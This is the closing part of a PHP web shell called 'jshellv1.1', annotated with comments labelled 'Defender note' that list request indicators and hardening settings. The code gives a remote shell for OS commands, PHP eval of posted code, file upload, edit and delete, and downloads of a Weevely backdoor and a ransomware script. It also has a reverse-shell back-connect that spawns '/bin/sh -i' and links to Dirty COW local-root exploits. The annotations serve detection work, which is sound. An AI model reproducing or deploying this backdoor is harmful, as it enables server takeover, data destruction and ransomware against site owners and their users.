  550. $_SESSION['cfile'] = $_POST['pilih'];
  551. echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  552. }elseif($_POST['actionx'] == 'paste')
  553. {
  554. foreach($_SESSION['cfile'] as $paste)
  555. {
  556. copy($paste,$GLOBALS['getfullpath'].'/'.basename($paste));
  557. }
  558. unset($_SESSION['cfile']);
  559. echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  560. }
  561. }
  562. }
  /**
   * Prints the input form for one action; it only renders markup, the submitted
   * values are handled by the top-level dispatcher.
   *
   * $type selects the form:
   *  - cmd:  a text field `cmd` with submit `exec`
   *  - upl:  multi-file input `jfilez[]`, target directory `jdirz`, submit `upload`
   *  - edit: textarea `editfile` pre-filled with $text, submit `save`
   *  - lc:   a search box plus links to the c0w, cowroot and dirtycow-mem actions
   *  - bc:   fields `ip` (pre-filled with the client address) and `port`
   *          (pre-filled with 5758), submit `sbmt`
   *  - php:  textarea `code`, submit `sbmt`
   *
   * Defender note: these POST field names, together with the `jshell_act` query
   * value, are stable strings to match on in request bodies and WAF rules.
   *
   * @param string      $type form selector
   * @param string|null $text textarea content for the edit form
   */
  564. public function Jshell_act($type,$text = null)
  565. {
  566. if($type == 'cmd')
  567. {
  568. ?>
  569. <form method="post">
  570. <label>jshellv1.1 ~ $</label>
  571. <input type="text" name="cmd" class="input_m" style="width: 500px;"><input type="submit" name="exec" value=">>" class="submit_m">
  572. </form>
  573. <?php
  574. }elseif($type == 'upl')
  575. {
  576. ?>
  577. <center>
  578. <form method="post" enctype="multipart/form-data">
  579. <label>Select file ::</label>
  580. <input type="file" name="jfilez[]" class="input_m" multiple="">
  581. <label>Upload to ::</label>
  582. <input type="text" name="jdirz" value="<?=$GLOBALS['getfullpath'];?>" class="input_m"><input type="submit" name="upload" value="Upload !" class="submit_m">
  583. </form>
  584. </center>
  585. <?php
  586. }elseif ($type == 'edit') {
  587. ?>
  588. <center>
  589. <form method="post">
  590. <textarea class="txtarea_m" name="editfile"><?=$text;?></textarea>
  591. <br/>
  592. <input type="submit" name="save" value="Save" class="submit_m" style="padding: 10px;width: 200px;cursor: pointer;">
  593. </form>
  594. </center>
  595. <?php
  596. }elseif($type == 'lc')
  597. {
  598. ?>
  599. <center>
  600. <form method="get" action="" target="_blank">
  601. <label for="q">Search on google</label>
  602. <input type="text" name="q" placeholder="Search exploit" class="input_m">
  603. <input type="submit" value=">>" class="submit_m">
  604. </form>
  605. <br>
  606. [<a href="javascript:menuklik('?jshell_path=<?=$_GET['jshell_path'];?>&jshell_act=c0w');">c0w</a>]
  607. [<a href="javascript:menuklik('?jshell_path=<?=$_GET['jshell_path'];?>&jshell_act=cowroot');">cowroot</a>]
  608. [<a href="javascript:menuklik('?jshell_path=<?=$_GET['jshell_path'];?>&jshell_act=dirtycow-mem');">dirty-mem</a>]
  609. [<a href="" target="_blank">localroot ex-db</a>]
  610. </center>
  611. <?php
  612. }elseif($type == 'bc')
  613. {
  614. ?><center>
  615. <form method="post">
  616. <label for="ip">IP </label>
  617. <input type="text" name="ip" class="input_m" value="<?=$_SERVER['REMOTE_ADDR'];?>">
  618. <label for="port">Port</label>
  619. <input type="text" name="port" class="input_m" value="5758">
  620. <input type="submit" name="sbmt" value=">>" class="submit_m">
  621. </form>
  622. </center>
  623. <?php
  624. }elseif ($type == 'php') {
  625. ?>
  626. <center>
  627. <form method="post">
  628. <textarea class="txtarea_m" name="code">echo "hello noob";</textarea><br>
  629. <input type="submit" name="sbmt" value="Run !" class="submit_m" style="width: 120px">
  630. </form>
  631. </center>
  632. <?php
  633. }
  634. }
  636. }
  // Entry point and request dispatcher.
  //
  // The constructor enforces the login gate and exits for unauthenticated
  // requests, so everything below runs only with $_SESSION['jshell'] set.
  // With no `jshell_act` in the query string the file manager is shown;
  // otherwise the action code selects one branch:
  //   del / ren / edit / view - file operations on jshell_path + jshell_file
  //   logout                  - destroys the session
  //   cmd                     - OS command from POST `cmd`
  //   upl                     - file upload into POST `jdirz`
  //   wev / rans              - fetch a remote payload into Jweevely.php / s57rsw.php
  //   lc                      - local privilege-escalation helper page
  //   net                     - outbound TCP connection to POST `ip`:`port`
  //   php                     - eval() of POST `code`
  //
  // Defender notes: none of the path, command or code inputs is validated.
  // Useful indicators from this block are the query parameters jshell_act,
  // jshell_path, jshell_file and n, the dropped file names Jweevely.php and
  // s57rsw.php in the script's working directory, and web-server-originated
  // outbound connections. Relevant hardening settings are disable_functions,
  // allow_url_fopen and open_basedir, plus a non-writable web root.
  639. $js = new Jshell;
  641. $js->Jheader($config);
  642. if(empty($_GET['jshell_act']))
  643. {
  644. $js->Jfileman($GLOBALS['getfullpath']);
  645. }else{
  646. //000000000000000000000000000000
  647. $jfilez = @$_GET['jshell_file'];
  648. $jpaptt = @$_GET['jshell_path'];
  649. //000000000000000000000000000000
  650. if($_GET['jshell_act'] == 'del')
  651. {
  // Target is the directory itself when no file name is given.
  652. $delt = (empty($jfilez)) ? $jpaptt : $jpaptt.'/'.$jfilez;
  653. if($js->Jdel($delt)){
  654. echo "<b> Successfully deleted files ~ </b>";
  655. echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  656. }else{
  657. echo $delt."<br/>";
  658. echo "<b> Failed delete files ~ </b>";
  659. echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  661. }
  662. }elseif ($_GET['jshell_act'] == 'ren') {
  // New name comes from the `n` query parameter and is joined to the same directory.
  663. $fold = $jpaptt.'/'.$jfilez;
  664. $fnew = $jpaptt.'/'.$_GET['n'];
  665. if(@rename($fold,$fnew))
  666. {
  667. echo "<b> Successfully rename files ~ </b>";
  668. echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  669. }else{
  670. echo "<b> Failed rename files ~ </b>";
  671. echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  672. }
  674. }
  675. elseif($_GET['jshell_act'] == 'edit')
  676. {
  677. $baselink = '?jshell_path='.$jpaptt.'&jshell_file='.$jfilez.'&jshell_act=';
  678. $js->Jtitle('Edit file');
  679. echo "<ul>Files :<b> ".$jfilez."</b> | Owner:group : <b>".$js->Jgetowner($jpaptt.'/'.$jfilez).":".$js->Jgetgroup($jpaptt.'/'.$jfilez)."</b> | Permission : <b>".$js->Jgetperms($jpaptt.'/'.$jfilez)."</b> | Date modified : <b>".$js->Jgetdmod($jpaptt.'/'.$jfilez)."</b> | Action :: <li>[<a href=\"javascript:menuklik('".$baselink."edit')\">Edit</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."del')\">Delete</a>]</li><li>[<a href=\"javascript:rename('".$jpaptt."','".$jfilez."')\">Rename</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."dl')\">Download</a>]</li></ul>";
  // File content is HTML-escaped only for display in the textarea; the saved content is the raw POST value.
  680. $js->Jshell_act('edit',htmlspecialchars(file_get_contents($jpaptt.'/'.$jfilez)));
  681. if(isset($_POST['save']))
  682. {
  683. $fp = $jpaptt.'/'.$jfilez;
  684. $content = $_POST['editfile'];
  685. if($js->Jwrite($fp,$content))
  686. {
  687. echo "<b> Successfully Edit files ~ </b>";
  688. }else{
  689. echo "<b>Failed Edit files ~ </b>";
  690. }
  691. }
  692. }
  693. elseif ($_GET['jshell_act'] == 'view') {
  694. $js->Jtitle('View file');
  695. $baselink = '?jshell_path='.$jpaptt.'&jshell_file='.$jfilez.'&jshell_act=';
  696. echo "<ul>Files :<b> ".$jfilez."</b> | Owner:group : <b>".$js->Jgetowner($jpaptt.'/'.$jfilez).":".$js->Jgetgroup($jpaptt.'/'.$jfilez)."</b> | Permission : <b>".$js->Jgetperms($jpaptt.'/'.$jfilez)."</b> | Date modified : <b>".$js->Jgetdmod($jpaptt.'/'.$jfilez)."</b> | Action :: <li>[<a href=\"javascript:menuklik('".$baselink."edit')\">Edit</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."del')\">Delete</a>]</li><li>[<a href=\"javascript:rename('".$jpaptt."','".$jfilez."')\">Rename</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."dl')\">Download</a>]</li></ul>";
  697. echo $js->Jvf($jpaptt.'/'.$jfilez);
  698. }
  699. elseif($_GET['jshell_act'] == 'logout')
  700. {
  701. session_destroy();
  702. }elseif ($_GET['jshell_act'] == 'cmd') {
  703. $js->Jtitle('Command Shell');
  704. $js->Jshell_act('cmd');
  705. if(isset($_POST['exec'])){
  706. echo "<pre class='code'>";
  // POST `cmd` goes to the OS unmodified and its output is echoed without escaping.
  707. echo $js->Jcmd($_POST['cmd']);
  708. echo "</pre>";
  709. }
  710. }elseif($_GET['jshell_act'] == 'upl')
  711. {
  712. $js->Jtitle('Uploader');
  713. $js->Jshell_act('upl');
  714. if(isset($_POST['upload'])){
  715. echo "<pre class='code'>";
  716. $file_up = $js->array_upload($_FILES['jfilez']);
  717. foreach($file_up as $filup){
  // Destination = POST `jdirz` + "/" + the client-supplied file name.
  718. if($js->Jupl($filup['tmp_name'],$_POST['jdirz']."/".$filup['name'])){
  719. $res_upl.="Successfuly Upload file : ".$_POST['jdirz']."/".$filup['name'];
  720. }else{
  721. $res_upl.="Failed to upload file !";}
  722. }
  723. echo $res_upl."<br/></pre>";
  724. }
  725. }elseif ($_GET['jshell_act'] == 'wev') {
  726. $js->Jtitle('Weevely remote shell backdoor');
  // Second-stage drop: the remote file is saved as Jweevely.php in the working directory.
  727. if($js->Jcaller($js->src_link['weevely'],'Jweevely.php'))
  728. {
  729. echo "<center><b>Successfuly called <a href='Jweevely.php' target='_blank'>Jweevely.php</a> !!</b><br/>";
  730. echo "<p>password :: jshellv1 ,<br/> open your terminal and remote weevely :D </p>";
  731. echo "<pre>$ weevely http://".$_SERVER['HTTP_HOST']."/".dirname($_SERVER['PHP_SELF'])."/Jweevely.php jshellv1 </pre>";
  732. }else{
  733. echo "request failed";
  734. }
  736. }elseif ($_GET['jshell_act'] == 'lc') {
  737. $js->Jtitle('Localroot');
  738. $js->Jshell_act('lc');
  739. }elseif($_GET['jshell_act'] == 'net')
  740. {
  741. $js->Jtitle('BackConnect');
  742. $js->Jshell_act('bc');
  743. if(isset($_POST['sbmt']))
  744. {
  // Outbound connection from the web server to a request-supplied host and port.
  745. $sock=fsockopen($_POST['ip'],$_POST['port']);
  746. if($sock)
  747. {
  748. echo "<center>Connection estabilished~</center> <br>";
  749. }else{
  750. echo "<center>Connection failed</center><br>";
  751. }
  752. $js->cmd("/bin/sh -i <&3 >&3 2>&3");
  753. }
  754. }elseif($_GET['jshell_act'] == 'rans')
  755. {
  756. $js->Jtitle('Ransomware ');
  // Second-stage drop: the remote file is saved as s57rsw.php in the working directory.
  757. if($js->Jcaller($js->src_link['ransomware'],'s57rsw.php'))
  758. {
  759. echo "<center><b>Successfuly called <a href='s57rsw.php' target='_blank'>s57rsw.php</a> !!</b><br/>";
  760. }else{
  761. echo "request failed";
  762. }
  763. }elseif($_GET['jshell_act'] == 'php')
  764. {
  765. $js->Jtitle('Eval PHP');
  767. if(isset($_POST['sbmt']))
  768. {
  769. echo "<hr>";
  // Arbitrary PHP from POST `code` runs inside this process; @ hides any resulting errors.
  770. @eval($_POST['code']);
  771. echo "<hr>";
  772. $js->Jshell_act('php');
  773. }else{
  774. $js->Jshell_act('php');
  775. }
  776. }
  777. }
  778. ?>